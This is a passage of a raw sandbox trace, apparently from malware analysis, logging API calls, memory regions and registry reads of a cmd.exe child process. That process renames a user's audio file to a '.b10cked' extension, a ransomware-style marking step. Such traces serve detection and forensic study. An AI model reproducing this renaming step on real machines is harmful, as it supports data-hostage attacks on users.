moved.\r\n") returned 0x13 [0225.404] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x2aeec0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.404] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2aeea4, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x2aeea4*=0x1a) returned 1 [0225.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.404] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.405] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.405] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.405] SetConsoleInputExeNameW () returned 0x1 [0225.405] GetConsoleOutputCP () returned 0x1b5 [0225.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.405] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.405] exit (_Code=0) Process: id = "590" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c80" os_pid = "0x15c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33589 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33590 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33591 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33592 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 33593 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33594 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33595 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33596 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33597 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33598 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33717 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33718 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33719 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33720 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 33721 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 33722 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33723 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33724 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33725 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33726 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33727 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33728 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33729 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33730 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33731 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 33732 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33733 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33734 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33735 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33736 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33737 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33738 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 33739 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 33740 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Thread: id = 813 os_tid = 0xee4 [0225.072] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fdac | out: lpSystemTimeAsFileTime=0x22fdac*(dwLowDateTime=0xb9b8a6e0, dwHighDateTime=0x1d440a9)) [0225.072] GetCurrentProcessId () returned 0x15c [0225.072] GetCurrentThreadId () returned 0xee4 [0225.072] GetTickCount () returned 0x3e262 [0225.072] QueryPerformanceCounter (in: lpPerformanceCount=0x22fda4 | out: lpPerformanceCount=0x22fda4*=28186108721) returned 1 [0225.073] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.073] __set_app_type (_Type=0x1) [0225.073] __p__fmode () returned 0x76b331f4 [0225.073] __p__commode () returned 0x76b331fc [0225.073] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.073] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.073] GetCurrentThreadId () returned 0xee4 [0225.073] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xee4) returned 0x38 [0225.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.073] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.073] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.074] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.074] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fd3c | out: phkResult=0x22fd3c*=0x0) returned 0x2 [0225.074] VirtualQuery (in: lpAddress=0x22fd73, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.074] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.074] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.074] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.074] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0225.074] GetConsoleOutputCP () returned 0x1b5 [0225.074] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.074] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.074] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.074] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.075] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.075] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.075] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.075] GetEnvironmentStringsW () returned 0x3a0180* [0225.075] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0225.076] GetEnvironmentStringsW () returned 0x3a0180* [0225.076] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0225.076] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ecac | out: phkResult=0x22ecac*=0x40) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0xa8, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x1, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x1, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x0, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x40, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x40, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x40, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.076] RegCloseKey (hKey=0x40) returned 0x0 [0225.076] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ecac | out: phkResult=0x22ecac*=0x40) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x40, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x1, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x1, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x0, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x9, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x9, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x9, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.078] RegCloseKey (hKey=0x40) returned 0x0 [0225.078] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.078] srand (_Seed=0x5b8863b9) [0225.078] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"" [0225.078] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"" [0225.078] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.078] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.079] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.079] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.079] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.079] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.079] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.079] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.079] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.079] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.079] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.079] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.079] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.079] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.079] GetEnvironmentStringsW () returned 0x3a22d0* [0225.079] FreeEnvironmentStringsW (penv=0x3a22d0) returned 1 [0225.080] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.080] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.080] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.080] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.080] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.080] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.080] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.080] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.080] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.080] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fa78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.080] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fa78, lpFilePart=0x22fa74 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fa74*="Desktop") returned 0x18 [0225.080] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.080] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f7f4 | out: lpFindFileData=0x22f7f4) returned 0x3a0010 [0225.080] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0225.081] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f7f4 | out: lpFindFileData=0x22f7f4) returned 0x3a0010 [0225.081] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0225.081] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f7f4 | out: lpFindFileData=0x22f7f4) returned 0x3a0010 [0225.081] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0225.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.081] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.081] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.081] GetEnvironmentStringsW () returned 0x3a2af0* [0225.081] FreeEnvironmentStringsW (penv=0x3a2af0) returned 1 [0225.082] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.082] GetConsoleOutputCP () returned 0x1b5 [0225.082] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.082] GetUserDefaultLCID () returned 0x409 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fbb8, cchData=128 | out: lpLCData="0") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fbb8, cchData=128 | out: lpLCData="0") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fbb8, cchData=128 | out: lpLCData="1") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.083] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.083] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.084] GetConsoleTitleW (in: lpConsoleTitle=0x3908e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.084] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.084] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.084] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.085] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.085] _wcsicmp (_String1="move", _String2=")") returned 68 [0225.085] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.085] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.086] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.086] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.086] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.086] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.088] GetConsoleTitleW (in: lpConsoleTitle=0x22f8b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.379] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.379] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.379] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.379] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.379] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.379] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.379] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.379] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.379] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.379] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.379] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.379] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0225.379] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.379] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.379] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.379] _wcsicmp (_String1="move", _String2="MD") returned 11 [0225.379] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.379] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.379] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.379] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.379] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.379] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.379] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.379] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.380] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.380] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.380] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.380] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.380] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0225.380] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.380] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.380] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.380] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0225.380] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.380] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 